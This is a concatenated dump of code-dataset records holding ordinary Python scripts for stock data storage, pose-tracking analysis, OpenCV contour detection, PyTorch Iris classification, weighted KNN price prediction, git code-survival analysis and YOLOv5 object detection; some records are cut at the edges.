diff=int(row[2]), start_price=row[3],\n                                        top_price=row[4], low_price=row[5], volume=row[6])\n            stock_object.save()\n\ndef db_connect(event, context):\n    # stocks = Stock.select()\n    # for stock in stocks:\n    #     print(stock.each_date, stock.price)\n    # return len(stocks)\n    return db.get_tables()\n\nif __name__ == \"__main__\":\n    db_migrate(None, None)","sub_path":"db_connect.py","file_name":"db_connect.py","file_ext":"py","file_size_in_byte":1080,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"622563693","text":"import numpy as np\r\nimport pandas as pd\r\nimport glob\r\nimport os\r\n\r\n# goes through each csv file and finds the frames in which every joint is past the 400-pixel y zone\r\n# (pandas auto-renames the duplicated 'y' headers of the bodyparts to 'y', 'y.1', 'y.2', ...)\r\npath = r\"Y:\\\\DLC\\\\ACC_DMS_imaging-acb-2020-09-01\\\\videos\\\\*.csv\"\r\nd = []\r\nfor fname in glob.glob(path):\r\n    df = pd.read_csv(fname, skiprows=2)\r\n    df2 = df[(df['y'] > 400) & (df['y.1'] > 400) & (df['y.2'] > 400) & (df['y.3'] > 400) & (df['y.4'] > 400)]\r\n    dis = df2['y'].count()\r\n    tot = df['y'].count()\r\n    val = (dis/tot)*100\r\n    d.append(val)\r\n    print(val)\r\n\r\n
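# (Added caution: the glob path above is identical to the imaging path in\r\n# the next loop, yet this loop's percentages are later saved as 'opto.npy';\r\n# double-check that the intended opto directory is being read.)\r\n\r\n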
percentages \r\nfrom numpy import save\r\nsave('imaging.npy', d2)\r\nsave('opto.npy', d)\r\n\r\n# find and save file names \r\npath = r\"Y:\\DLC\\ACC-DMS_nphr-acb-2020-07-30\\videos\\pre-track\\*.csv\"\r\nframes = []\r\nfor fname in glob.glob(path):\r\n frames.append(fname)\r\n print(fname)\r\nsave('opto_names.npy', frames)\r\n\r\n# dataframe of both file names + percent disengaged \r\ndf = pd.DataFrame(np.load('imaging_names.npy'), columns = ['names'])\r\ndf['disengaged'] = np.load('imaging.npy')\r\ndf2 = df[df['disengaged'] > 15] #new data frame with outlier percentage points \r\ndf2\r\n# df2['names'].str.slice(45, 72) #file names are annoyingly long so use this to get the important file name info\r\n\r\n\r\n","sub_path":"ACC-DMS DLC/Disengaged-Analysis/find_percent_disenaged_frames.py","file_name":"find_percent_disenaged_frames.py","file_ext":"py","file_size_in_byte":1895,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"634986698","text":"import cv2\nimport numpy as np\nimport time\nimport math\n\n# 검은색 이미지 개수 -\n# gray 범위는 0~255인데 이 범위를 몇개로 나눌것인지\nimage_num = 16\n\n\n# 컨투어 찾기\ndef findContour(image):\n # 글자의 외각만 찾기, 좌표들은 contours에 들어있음\n contours, hierarchy = cv2.findContours(image, cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE)\n\n # 컨투어 반환\n return contours, hierarchy\n\n\n# 종(0)켈레톤\ndef skeletonize(img):\n start_time = time.time()\n\n # ret, img = cv2.threshold(img, 127, 255, cv2.THRESH_BINARY_INV)\n th, img = cv2.threshold(img, 0, 255, cv2.THRESH_BINARY | cv2.THRESH_OTSU)\n skel = img.copy()\n cv2.imshow('binary_image', img)\n skel[:, :] = 0\n kernel = cv2.getStructuringElement(cv2.MORPH_CROSS, (3, 3))\n\n while True:\n eroded = cv2.morphologyEx(img, cv2.MORPH_ERODE, kernel)\n temp = cv2.morphologyEx(eroded, cv2.MORPH_DILATE, kernel)\n temp = cv2.subtract(img, temp)\n skel = cv2.bitwise_or(skel, temp)\n img[:, :] = eroded[:, :]\n if cv2.countNonZero(img) == 0:\n break\n print('종켈레톤 끝 : ', time.time() - start_time, '\\n')\n\n return skel\n\n\ndef hsvEqualized(hsv_image):\n start_time = time.time()\n\n h, s, v = cv2.split(hsv_image)\n\n # h,s,v값을 히스토그램 평활화\n equalizedH = cv2.equalizeHist(h)\n equalizedS = cv2.equalizeHist(s)\n equalizedV = cv2.equalizeHist(v)\n\n # h,s,v,를 각각 평활화 작업후 를 합쳐서 새로운 hsv 이미지를 만듦.\n new_hsv_image = cv2.merge([equalizedH, equalizedS, equalizedV])\n\n # hsv -> bgr\n new_hsv_image = cv2.cvtColor(new_hsv_image, cv2.COLOR_HSV2BGR)\n\n print('hsv 평활화 후 bgr 이미지로 변환 : ', time.time() - start_time, '\\n')\n return new_hsv_image\n\n\n# 색의 개수 만큼 검은색 이미지를 만든다.\ndef createBlackImage(image):\n start_time = time.time()\n\n print('검은색 이미지 ' + str(image_num) + '개 만들기 시작')\n\n draw_image_list = []\n\n for i in range(0, image_num):\n black_image = np.zeros_like(image)\n draw_image_list.append(black_image)\n\n print('검은색 이미지 만들기 끝 : ', time.time() - start_time, '\\n')\n\n return draw_image_list\n\n\n# 검은색 이미지위에 뽑아낸 색 그리기\ndef blackImageDraw(x_y_line_image, black_image_list):\n start_time = time.time()\n print('검은색 이미지 위에 색 그리기 시작')\n devide_range = math.ceil(255 / image_num)\n for index, image in enumerate(black_image_list):\n pts = np.where(\n (x_y_line_image >= (devide_range * (index))) & (x_y_line_image < (devide_range * (index + 1))))\n # print(devide_range * index, devide_range * (index + 1))\n black_image_list[index][pts[0], pts[1]] = 255\n cv2.imshow('basic' + str(index), black_image_list[index])\n\n # 가로로 늘리기\n kernel = np.ones((8, 3), np.uint8)\n black_image_list[index] = cv2.morphologyEx(black_image_list[index], 
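Annotation: the `skeletonize` routine in the OpenCV record above is the standard morphological skeleton: repeatedly erode, subtract the opening, and OR the residue into the result until the image is empty. A compact restatement of the same loop, assuming a binary `uint8` input such as the record's Otsu-thresholded image:

```python
import cv2
import numpy as np

def morph_skeleton(binary):
    """Morphological skeleton: at each scale, keep the pixels that an
    opening would erase, and OR them into the accumulated result."""
    skel = np.zeros_like(binary)
    kernel = cv2.getStructuringElement(cv2.MORPH_CROSS, (3, 3))
    img = binary.copy()
    while cv2.countNonZero(img) > 0:
        eroded = cv2.erode(img, kernel)
        opened = cv2.dilate(eroded, kernel)          # opening of img at this scale
        skel = cv2.bitwise_or(skel, cv2.subtract(img, opened))
        img = eroded
    return skel
```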
cv2.MORPH_CLOSE, kernel, iterations=1)\n\n # 침식\n kernel = np.ones((2, 2), np.uint8)\n black_image_list[index] = cv2.erode(black_image_list[index], kernel, iterations=1)\n\n # cv2.imshow('black' + str(index), black_image_list[index])\n # cv2.waitKey(0)\n print('검은색 이미지 위에 색 그리기 끝 : ', time.time() - start_time, '\\n')\n\n return black_image_list\n\n\n# 시간체크 시작\nstart_time = time.time()\n\n# 이미지 경로\nimage_path = '../image/test_image/2.jpg'\n\n# bgr 이미지 불러오기\nbgr_image = cv2.imread(image_path)\ncv2.imshow('bgr_image', bgr_image)\n\n# bgr -> hsv로 변환\nhsv_image = cv2.cvtColor(bgr_image, cv2.COLOR_BGR2HSV)\n\n# hsb 이미지 평활화 후 bgr 이미지로 바꾸는 작업\nnew_bgr_image = hsvEqualized(hsv_image)\n\n# bgr -> gray 변환\ngray_image = cv2.cvtColor(bgr_image, cv2.COLOR_BGR2GRAY)\ncv2.imshow('gray_image', gray_image)\n\n# 가로선 추출\nx_line_image = cv2.Sobel(gray_image, cv2.CV_64F, 0, 1, ksize=1)\nx_line_image = np.absolute(x_line_image)\nx_line_image = np.uint8(x_line_image)\ncv2.imshow('x_line_image', x_line_image)\n\n# 세로선 추출\ny_line_image = cv2.Sobel(gray_image, cv2.CV_64F, 1, 0, ksize=1)\ny_line_image = np.absolute(y_line_image)\ny_line_image = np.uint8(y_line_image)\ncv2.imshow('y_line_image', y_line_image)\n\n# 가로 세로 합친 이미지 보여주기\nbgr_x_line_add_y_line_image = cv2.bitwise_or(x_line_image, y_line_image)\ncv2.imshow('bgr_x_line_add_y_line_image', bgr_x_line_add_y_line_image)\n\n\"\"\" 추가 작업 해보는 곳 \"\"\"\n\n\"\"\"\"\"\"\n\n# 검은색 이미지 만들기\nblack_image_list = createBlackImage(bgr_x_line_add_y_line_image)\n\n# 검은색 이미지위에 gray 범위 값에 해당하는 부분 흰색으로 그리는 메서드\ndraw_image_list = blackImageDraw(bgr_x_line_add_y_line_image, black_image_list)\n\n# 네모영역 그리기\ncontour_count = 0 # 컨투어 개수\nfor i in draw_image_list:\n con, hierarchy = findContour(i)\n for index, j in enumerate(con):\n x, y, w, h = cv2.boundingRect(j)\n cv2.rectangle(bgr_image, (x, y), (x + w, y + h), (0, 0, 255), 1)\n contour_count = contour_count + 1\n\n# 종영 스켈레톤 적용 - 스켈레톤화된 이미지 반환함.\nskel_image = skeletonize(bgr_x_line_add_y_line_image)\ncv2.imshow('skel_image', skel_image)\n\n# 컨투어 찾기\ncontour, hierarchy = findContour(skel_image)\n\n# 네모영역 그리기\n# for i, con in enumerate(contour):\n# x, y, w, h = cv2.boundingRect(con)\n#\n# cv2.rectangle(bgr_image, (x, y), (x + w, y + h), (0, 0, 255), 1)\n# cv2.circle(bgr_image, (int((x + x + w) / 2), int((y + y + h) / 2)), 1, (0, 0, 255), 1)\n# crop_image = new_bgr_image[y:y + h + 1, x:x + w + 1]\n# cv2.imwrite('../resultFolder/' + str(i) + '_crop.jpg', crop_image)\n\n# 최종이미지 출력\ncv2.imshow('result', bgr_image)\n\nprint('컨투어 개수 : ', contour_count)\n# 시간측정 끝\nprint(\"코드 수행시간 : \", time.time() - start_time)\ncv2.waitKey(0)\n","sub_path":"DongHwi/2020-02-14.py","file_name":"2020-02-14.py","file_ext":"py","file_size_in_byte":5993,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"639345349","text":"import dataset\nimport helper\nimport transforms\nimport model\nimport meter\nimport time\n\nimport torch\nimport torch.nn as nn\nfrom torch.utils import data\nfrom torch.utils.data.sampler import SubsetRandomSampler\n\n\n#Hyper Paramater\nLRATE = 0.01\nBSIZE = 128\nNUM_EPOCH = 100\n\n\n\npath = 'dataset/iris.data'\nfeature_cols = ['sepal_length', 'sepal_width','petal_length','petal_witdh']\ntarget_cols = ['species']\nCLAZZ = [\"Iris-setosa\", \"Iris-versicolor\", \"Iris-virginica\"]\n\niris_dataset = dataset.IrisDataset(\n path, feature_cols,\n target_cols, CLAZZ,\n transforms_feature=transforms.NumpyToFloatTensor(),\n transforms_target=transforms.NumpyToLongTensor())\n\ntrain_idx, valid_idx = 
helper.indice_splitter(iris_dataset, valid_size=0.2)\n\ntrain_loader = data.DataLoader(iris_dataset, batch_size=BSIZE, sampler=SubsetRandomSampler(train_idx), num_workers=0)\nvalid_loader = data.DataLoader(iris_dataset, batch_size=BSIZE, sampler=SubsetRandomSampler(valid_idx), num_workers=0)\n\nmodel = model.IrisNetwork(4,32,3)\ncriterion = nn.CrossEntropyLoss()\noptimizer = torch.optim.SGD(model.parameters(), lr=LRATE)\n\nbest_loss = 1.5\nhistory = {'epoch':[], 'train_loss':[],'valid_loss':[],}\nfor epoch in range(NUM_EPOCH):\n batch_time = meter.AverageMeter()\n data_time = meter.AverageMeter()\n losses = meter.AverageMeter()\n\n end_time = time.time()\n for idx, (x_train, y_train) in enumerate(train_loader):\n data_time.update(time.time() - end_time)\n\n out = model(x_train)\n loss = criterion(out, y_train)\n loss.backward()\n optimizer.step()\n\n losses.update(loss.item(), x_train.size(0))\n batch_time.update(time.time() - end_time)\n end_time = time.time()\n\n print(f'Train Epoch [{epoch+1}/{NUM_EPOCH}] [{idx}/{len(train_loader)}]\\t'\n f' Time {batch_time.val:.3f} ({batch_time.avg:.3f})\\t'\n f' Data {data_time.val:.3f} ({data_time.avg:.3f})\\t'\n f' Loss {losses.val:.4f} ({losses.avg:.4f}) ')\n\n history['epoch'].append(epoch)\n history['train_loss'].append(losses.avg)\n\n\n with torch.no_grad():\n end_time = time.time()\n for idx, (x_valid, y_valid) in enumerate(valid_loader):\n data_time.update(time.time() - end_time)\n\n out = model(x_valid)\n loss = criterion(out, y_valid)\n\n losses.update(loss.item(), x_valid.size(0))\n batch_time.update(time.time() - end_time)\n end_time = time.time()\n\n print(f'Valid Epoch [{epoch + 1}/{NUM_EPOCH}] [{idx}/{len(valid_loader)}]\\t'\n f' Time {batch_time.val:.3f} ({batch_time.avg:.3f})\\t'\n f' Data {data_time.val:.3f} ({data_time.avg:.3f})\\t'\n f' Loss {losses.val:.4f} ({losses.avg:.4f}) ')\n\n history['valid_loss'].append(losses.avg)\n\n is_best = losses.avg < best_loss\n best_loss = min(losses.avg, best_loss)\n helper.save_checkpoint({\n 'epoch': epoch + 1,\n 'batch_size': BSIZE,\n 'learning_rate': LRATE,\n 'total_clazz': len(CLAZZ),\n 'class_to_idx': iris_dataset.class_to_idx,\n 'labels': CLAZZ,\n 'history': history,\n 'arch': 'IrisNet',\n 'state_dict': model.state_dict(),\n 'best_loss': best_loss,\n 'optimiz1er': optimizer.state_dict(),\n }, is_best)\n\n","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":3307,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"536421970","text":"import numpy as np\nimport pandas as pd\nfrom scipy.io import arff\nfrom sklearn.model_selection import LeaveOneOut\nfrom scaler import MinMaxScaler\nfrom distance import Manhattan, Euclidean\nfrom KNN import KNN\n\n# knn for numeric prediction\n #approach 1: Inverse distance\nclass Weight_approach1:\n def __init__(self):\n self.name = \"inverse\"\n \n def calc_weight(self, dist):\n return 1/(dist+0.00000000001)\n\n#approach 2: Inverse distance squared\nclass Weight_approach2:\n def __init__(self):\n self.name = \"inverse squared\"\n\n def calc_weight(self, dist):\n return 1/(dist*dist+0.00000000001)\n\n\n #approach 3: Exponential \nclass Weight_approach3:\n def __init__(self):\n self.name = \"exponential\"\n def calc_weight(self, dist):\n return np.exp(-dist)\n\n#appoarch 4\nclass Weight_approach4:\n def __init__(self):\n self.name = \"Dudani\"\n def calc_weight(self, dist, x):\n if len(dist) == 1:\n return dist[0]+0.0000000000001\n else:\n return (dist[-1]-x+0.000000000001) / 
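Annotation: one detail worth flagging in the training loop above: it calls `loss.backward()` and `optimizer.step()` without ever clearing gradients, so PyTorch keeps accumulating them across batches. A minimal corrected inner step, reusing the names from the record:

```python
for x_train, y_train in train_loader:
    optimizer.zero_grad()            # without this, .backward() adds to stale gradients
    out = model(x_train)
    loss = criterion(out, y_train)
    loss.backward()
    optimizer.step()
```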
(dist[-1]-dist[0] + 0.0001) # +0.0001 in case all k nearest have same dist\n\nclass KNN_Numeric(KNN):\n def __init__(self, x_data=[], labels=[], k_neighbours=7):\n super(KNN_Numeric, self).__init__(x_data, labels, k_neighbours)\n \n def predict_value(self, neighbours):\n return np.mean(neighbours)\n\n def predict(self, ux, method=None, distance = 'Euclidean'):\n dist = self.default_search(ux)\n neighbours = []\n for k in range(self.k_neighbours):\n neighbours.append(dist[k][self.LABEL_INDEX])\n return self.predict_value(neighbours)\n\n\nclass WKNN_Numeric(KNN_Numeric):\n def __init__(self, x_data=[], labels=[], k_neighbours=7,weight = 1):\n if weight == 1:\n self.w = Weight_approach1()\n elif weight == 2:\n self.w = Weight_approach2()\n elif weight == 3:\n self.w = Weight_approach3()\n elif weight == 4:\n self.w = Weight_approach4()\n else:\n self.w = Weight_approach1()\n super(WKNN_Numeric, self).__init__(x_data, labels, k_neighbours)\n \n def predict_value(self, neighbours):\n # Calculate weighted sum average\n total_value = 0\n total_weight = 0\n for i in range(len(neighbours)):\n if self.w.name == \"Dudani\":\n ng = []\n for j in range(len(neighbours)):\n ng.append(neighbours[j][self.DISTANCE_INDEX])\n weight = self.w.calc_weight(ng, neighbours[i][self.DISTANCE_INDEX])\n else:\n weight = self.w.calc_weight(neighbours[i][self.DISTANCE_INDEX])\n total_weight += weight \n total_value += (weight*neighbours[i][self.LABEL_INDEX])\n return total_value/total_weight \n\n\n def predict(self, ux):\n dist = self.default_search(ux)\n neighbours = []\n for k in range(self.k_neighbours):\n neighbours.append(dist[k])\n return self.predict_value(neighbours)\n\ndef Test_KNN_Numeric(x_data, labels):\n # Scale numeric features so they are between 0-1\n scaler = MinMaxScaler()\n scaled_x_data = scaler.fit_transform(x_data)\n\n x_test = scaled_x_data[0] # first entry is test data\n y_test = labels[0]\n x_train = scaled_x_data[1:] # the rest is training\n y_train = labels[1:]\n\n knn = KNN_Numeric(x_train, y_train, 7)\n print(f'Predicted Price: {knn.predict(x_test)}')\n print(f'Actual Price: {y_test}')\n\ndef cross_validation(x_data, labels, knn, k_neighbours=7, distance = Euclidean()):\n # Scale numeric features so they are between 0-1\n scaler = MinMaxScaler()\n scaled_x_data = scaler.fit_transform(x_data)\n knn.d = distance\n # Leave One Out Cross Validation\n loo = LeaveOneOut()\n predicted_error = []\n for train_index, test_index in loo.split(scaled_x_data):\n # Split training and test data\n X_train, X_test = scaled_x_data[train_index], scaled_x_data[test_index]\n y_train, y_test = labels[train_index], labels[test_index]\n \n # Set training data to knn \n knn.x_data = X_train\n knn.labels = y_train\n knn.k_neighbours = k_neighbours\n \n # Predict value\n predicted_value = knn.predict(X_test[0])\n # Store difference between predicted value and actual value in array \n predicted_error.append(np.abs(predicted_value - y_test[0]))\n \n # Determine the std deviation of predicted error\n print(f\"Mean of predicted error of KNN: {np.mean(predicted_error)}\")\n return np.mean(predicted_error)\n\n\"\"\" Args: data, list\n Creates new column for each label (label name + '-numeric') that encodes categorical labels to integers \n\"\"\"\ndef convert_to_numeric(data, labels):\n for label in labels:\n data[label] = data[label].astype('category')\n numeric_label = label + \"-numeric\"\n data[numeric_label] = data[label].cat.codes \n return data\n\ndef main():\n # Load data from autos.aff\n data_set = 
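Annotation: `Weight_approach4` above implements Dudani's rule for distance-weighted kNN, w_i = (d_k - d_i) / (d_k - d_1) over the ascending-sorted neighbour distances; the two small epsilons only guard the case where all k distances are equal. A tiny worked check:

```python
# Dudani weights: the nearest neighbour gets weight ~1, the farthest ~0.
# dists must be sorted ascending, as in the record above.
def dudani_weight(dists, d_i, eps=1e-12):
    return (dists[-1] - d_i + eps) / (dists[-1] - dists[0] + eps)

dists = [0.1, 0.4, 0.9]
print([round(dudani_weight(dists, d), 3) for d in dists])  # [1.0, 0.625, 0.0]
```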
arff.loadarff('autos.arff')\n data = pd.DataFrame(data_set[0]) \n\n # Make new numeric labels for each of these categorical labels \n data = convert_to_numeric(data, ['make', 'fuel-type', 'aspiration', 'num-of-doors', 'body-style', \n 'drive-wheels', 'engine-location', 'engine-type', 'num-of-cylinders', \n 'fuel-system'])\n \n # Remove the old categorical labels \n data.drop(['make', 'fuel-type', 'aspiration', 'num-of-doors', 'body-style', \n 'drive-wheels', 'engine-location', 'engine-type', 'num-of-cylinders', \n 'fuel-system', 'normalized-losses'], axis=1, inplace=True)\n\n # Remove missing values\n filtered = data.dropna()\n #print(data)\n print(filtered.shape)\n\n # Separate labels & x-data\n labels = filtered['price'].to_numpy()\n x_data = filtered.drop('price', axis=1)\n\n # TEMPORARY TEST FOR KNN NUMERIC\n # Test_KNN_Numeric(x_data, labels)\n\n # Cross Validation for KNN\n '''\n print(\"Cross Validation for normal KNN\")\n for i in range(1,10):\n cross_validation(x_data, labels, KNN_Numeric(), i)\n \n '''\n # Cross Validiation for KNN Weighted\n print(\"Cross Validation for weighted KNN\")\n for i in range(1, 10):\n cross_validation(x_data, labels, WKNN_Numeric(weight=4), i)\n \n\nif __name__ == \"__main__\":\n main()","sub_path":"KNN_Numeric.py","file_name":"KNN_Numeric.py","file_ext":"py","file_size_in_byte":6413,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"261489933","text":"# -*- coding: utf-8 -*-\n#\n# Copyright 2016 Erik Bernhardsson\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nfrom __future__ import print_function\nimport argparse, git, datetime, numpy, traceback, time, os, fnmatch, json, progressbar\n\nparser = argparse.ArgumentParser(description='Analyze git repo')\nparser.add_argument('--cohortfm', default='%Y', help='A Python datetime format string such as \"%%Y\" for creating cohorts (default: %(default)s)')\nparser.add_argument('--interval', default=7*24*60*60, type=int, help='Min difference between commits to analyze (default: %(default)s)')\nparser.add_argument('--ignore', default=[], action='append', help='File patterns that should be ignored (can provide multiple, will each subtract independently)')\nparser.add_argument('--only', default=[], action='append', help='File patterns that have to match (can provide multiple, will all have to match)')\nparser.add_argument('--outdir', default='.', help='Output directory to store results (default: %(default)s)')\nparser.add_argument('--branch', default='master', help='Branch to track (default: %(default)s)')\nparser.add_argument('repos', nargs=1)\nargs = parser.parse_args()\n\nrepo = git.Repo(args.repos[0])\ncommit2cohort = {}\ncode_commits = [] # only stores a subset\nmaster_commits = []\ncommit2timestamp = {}\ncohorts_set = set()\nexts_set = set()\nif not os.path.exists(args.outdir):\n os.makedirs(args.outdir)\n\nprint('Listing all commits')\nbar = progressbar.ProgressBar(max_value=progressbar.UnknownLength)\nfor i, commit in 
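Annotation: a caveat about `cross_validation` above: it min-max scales the whole dataset before `LeaveOneOut` splits it, so each held-out row leaks its values into the training-side scaling. A hedged sketch of the stricter ordering, fitting the scaler inside every fold; sklearn's `MinMaxScaler` stands in for the record's own `scaler` module, and `make_model` is a hypothetical factory:

```python
import numpy as np
from sklearn.model_selection import LeaveOneOut
from sklearn.preprocessing import MinMaxScaler

def loo_mean_error(x_data, labels, make_model):
    errors = []
    for train_idx, test_idx in LeaveOneOut().split(x_data):
        scaler = MinMaxScaler().fit(x_data[train_idx])       # fit on training rows only
        model = make_model(scaler.transform(x_data[train_idx]), labels[train_idx])
        pred = model.predict(scaler.transform(x_data[test_idx])[0])
        errors.append(abs(pred - labels[test_idx][0]))
    return np.mean(errors)
```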
enumerate(repo.iter_commits(args.branch)):\n bar.update(i)\n cohort = datetime.datetime.utcfromtimestamp(commit.committed_date).strftime(args.cohortfm)\n commit2cohort[commit.hexsha] = cohort\n cohorts_set.add(cohort)\n if len(commit.parents) == 1:\n code_commits.append(commit)\n last_date = commit.committed_date\n commit2timestamp[commit.hexsha] = commit.committed_date\n\nprint('Backtracking the master branch')\nbar = progressbar.ProgressBar(max_value=progressbar.UnknownLength)\ni, commit = 0, repo.head.commit\nlast_date = None\nwhile True:\n bar.update(i)\n if not commit.parents:\n break\n if last_date is None or commit.committed_date < last_date - args.interval:\n master_commits.append(commit)\n last_date = commit.committed_date\n i, commit = i+1, commit.parents[0]\n\ndef get_entries(commit):\n return [entry for entry in commit.tree.traverse()\n if entry.type == 'blob'\n and all([fnmatch.fnmatch(entry.path, pattern) for pattern in args.only])\n and not any([fnmatch.fnmatch(entry.path, pattern) for pattern in args.ignore])]\n\nprint('Counting total entries to analyze')\nentries_total = 0\nbar = progressbar.ProgressBar(max_value=len(master_commits))\nfor i, commit in enumerate(reversed(master_commits)):\n bar.update(i)\n n = 0\n for entry in get_entries(commit):\n n += 1\n _, ext = os.path.splitext(entry.path)\n exts_set.add(ext)\n entries_total += n\n\ndef get_file_histogram(commit, path):\n h = {}\n try:\n for old_commit, lines in repo.blame(commit, path):\n cohort = commit2cohort[old_commit.hexsha]\n h[cohort] = h.get(cohort, 0) + len(lines)\n if old_commit.hexsha in commit2timestamp:\n h[old_commit.hexsha] = h.get(old_commit.hexsha, 0) + len(lines)\n _, ext = os.path.splitext(path)\n h[ext] = h.get(ext, 0) + len(lines)\n except KeyboardInterrupt:\n raise\n except:\n traceback.print_exc()\n return h\n\ncurves = {}\nts = []\nfile_histograms = {}\nlast_commit = None\ncommit_history = {}\nprint('Analyzing commit history')\nbar = progressbar.ProgressBar(max_value=entries_total)\nentries_processed = 0\nfor commit in reversed(master_commits):\n t = datetime.datetime.utcfromtimestamp(commit.committed_date)\n ts.append(t)\n changed_files = set()\n for diff in commit.diff(last_commit):\n if diff.a_blob:\n changed_files.add(diff.a_blob.path)\n if diff.b_blob:\n changed_files.add(diff.b_blob.path)\n last_commit = commit\n \n histogram = {}\n entries = get_entries(commit)\n for entry in entries:\n bar.update(entries_processed)\n entries_processed += 1\n if entry.path in changed_files or entry.path not in file_histograms:\n file_histograms[entry.path] = get_file_histogram(commit, entry.path)\n for key, count in file_histograms[entry.path].items():\n histogram[key] = histogram.get(key, 0) + count\n\n for key, count in histogram.items():\n if key not in cohorts_set and key not in exts_set:\n commit_history.setdefault(key, []).append((commit.committed_date, count))\n\n for cohort in cohorts_set:\n curves.setdefault(cohort, []).append(histogram.get(cohort, 0))\n\n for ext in exts_set:\n curves.setdefault(ext, []).append(histogram.get(ext, 0))\n\n# Dump cohort plot data\ncohorts = sorted(cohorts_set)\nf = open(os.path.join(args.outdir, 'cohorts.json'), 'w')\njson.dump({'y': [curves[cohort] for cohort in cohorts],\n 'ts': [t.isoformat() for t in ts],\n 'labels': ['Code added in %s' % c for c in cohorts]}, f)\nf.close()\n\n# Dump file extension plot\nexts = sorted(exts_set)\nf = open(os.path.join(args.outdir, 'exts.json'), 'w')\njson.dump({'y': [curves[ext] for ext in exts],\n 'ts': [t.isoformat() for t 
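Annotation: the per-file histogram above rests on GitPython's `repo.blame(commit, path)`, which returns `(commit, lines)` pairs attributing each surviving line to the commit that last touched it. A stripped-down sketch counting surviving lines per year at the current HEAD (slow on large repositories, since blame runs once per file):

```python
import datetime
import git  # GitPython

repo = git.Repo('.')
head = repo.head.commit
survival = {}
for entry in head.tree.traverse():
    if entry.type != 'blob':
        continue
    for old_commit, lines in repo.blame(head, entry.path):
        year = datetime.datetime.utcfromtimestamp(
            old_commit.committed_date).strftime('%Y')
        survival[year] = survival.get(year, 0) + len(lines)
print(survival)  # e.g. {'2016': 1234, '2017': 567}
```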
in ts],\n 'labels': exts}, f)\nf.close()\n\n# Dump survival data\nf = open(os.path.join(args.outdir, 'survival.json'), 'w')\njson.dump(commit_history, f)\nf.close()\n","sub_path":"analyze.py","file_name":"analyze.py","file_ext":"py","file_size_in_byte":6051,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"315823159","text":"import sys\n# sys.path.append('D:\\python\\yolov5_notebook\\yolov5-master\\yolov5-master')\nsys.path.append('E:\\picture_fiting\\yolov5-master\\yolov5-master')\n\n\n\nfrom pathlib import Path\nimport numpy as np\nimport torch\nfrom numpy import random\nfrom models.yolo import Model\nfrom utils.general import set_logging, xyxy2xywh, scale_coords\nfrom utils.google_utils import attempt_download\nfrom utils.plots import plot_one_box_fir\nimport cv2\nimport time\nimport hubconf_video as hub\nfrom PIL import Image\n# import temperature as tp\n\n\n# from .\nclass detect_yolo:\n def __init__(self):\n # self.model = hub.create(name='yolov5s', pretrained=True, channels=3, classes=80) \n # self.model = hub.custom(path_or_model=r'D:\\python\\yolov5_notebook\\yolov5-master\\yolov5-master\\runs\\train\\exp\\weights\\best.pt') \n self.model = hub.custom(path_or_model=r'E:\\picture_fiting\\yolov5-master\\yolov5-master\\yolov5s.pt') \n # self.model = hub.custom(path_or_model=r'\\python\\yolov5_notebook\\yolov5-master\\yolov5-master\\yolov5s.pt') \n self.model = self.model.autoshape() \n self.model.conf = 0.5 # confidence threshold (0-1)\n self.model.iou = 0.45 # NMS IoU threshold (0-1)\n def detect_yolo_big (self, img):\n results = self.model(img)\n \n # pos = results.xyxy[0].cpu().numpy()\n pos = results.xyxy[0].cpu().numpy().tolist()\n print(pos)\n if pos :\n #results.xyxy[0] = x1,y1,x2,y2, score, 類別 \n # .cup() 當用gpu在跑時要回傳成cpu \n # numpy() tensor ->array\n # tolist() list -> array\n area_list = []\n for i in pos:\n area = (i[2]-i[0])*(i[3]-i[1]) \n area_list.append(area)\n # for i in pos:\n # area = (i[2]-i[0])*(i[3]-i[1]) \n # if i[4]>0.7 :\n # area_list.append(area)\n # else : \n pos_big_index = area_list.index(max(area_list))\n pos_big = list(map(int,pos[pos_big_index]))\n # pos_big = pos[pos_big_index]\n #找出最大面積\n return pos_big,len(pos)\n \n else:\n s =[0,0,0,0,0]\n return None,0\n def detect_yolo (self, img):\n results = self.model(img)\n pos1 = results.xyxy[0][:,:4].round()\n pos2 = results.xyxy[0][:,4:6]\n pos = torch.cat([pos1,pos2],dim=1)\n\n # print(\"cat\",torch.cat([results.xyxy[0][:,:4],results.xyxy[0][:,4:6]],dim=1) )\n # pos = results.xyxy[0].cpu().numpy().round()\n # pos = results.xyxy[0].cpu().numpy().tolist()\n # print(pos)\n #results.xyxy[0] = x1,y1,x2,y2, score, 類別 \n # .cup() 當用gpu在跑時要回傳成cpu \n # numpy() tensor ->array\n # tolist() list -> array\n return pos\n \ndef center(xyxy):\n x1,y1,x2,y2 = xyxy\n x = (x1 + x2)/2\n y = (y1 + y2)/2\n center = x , y\n return center\n\n\nnames = ['person', 'bicycle', 'car', 'motorcycle', 'airplane', 'bus', 'train', 'truck', 'boat', 'traffic light',\n 'fire hydrant', 'stop sign', 'parking meter', 'bench', 'bird', 'cat', 'dog', 'horse', 'sheep', 'cow',\n 'elephant', 'bear', 'zebra', 'giraffe', 'backpack', 'umbrella', 'handbag', 'tie', 'suitcase', 'frisbee',\n 'skis', 'snowboard', 'sports ball', 'kite', 'baseball bat', 'baseball glove', 'skateboard', 'surfboard',\n 'tennis racket', 'bottle', 'wine glass', 'cup', 'fork', 'knife', 'spoon', 'bowl', 'banana', 'apple',\n 'sandwich', 'orange', 'broccoli', 'carrot', 'hot dog', 'pizza', 'donut', 'cake', 'chair', 'couch',\n 'potted 
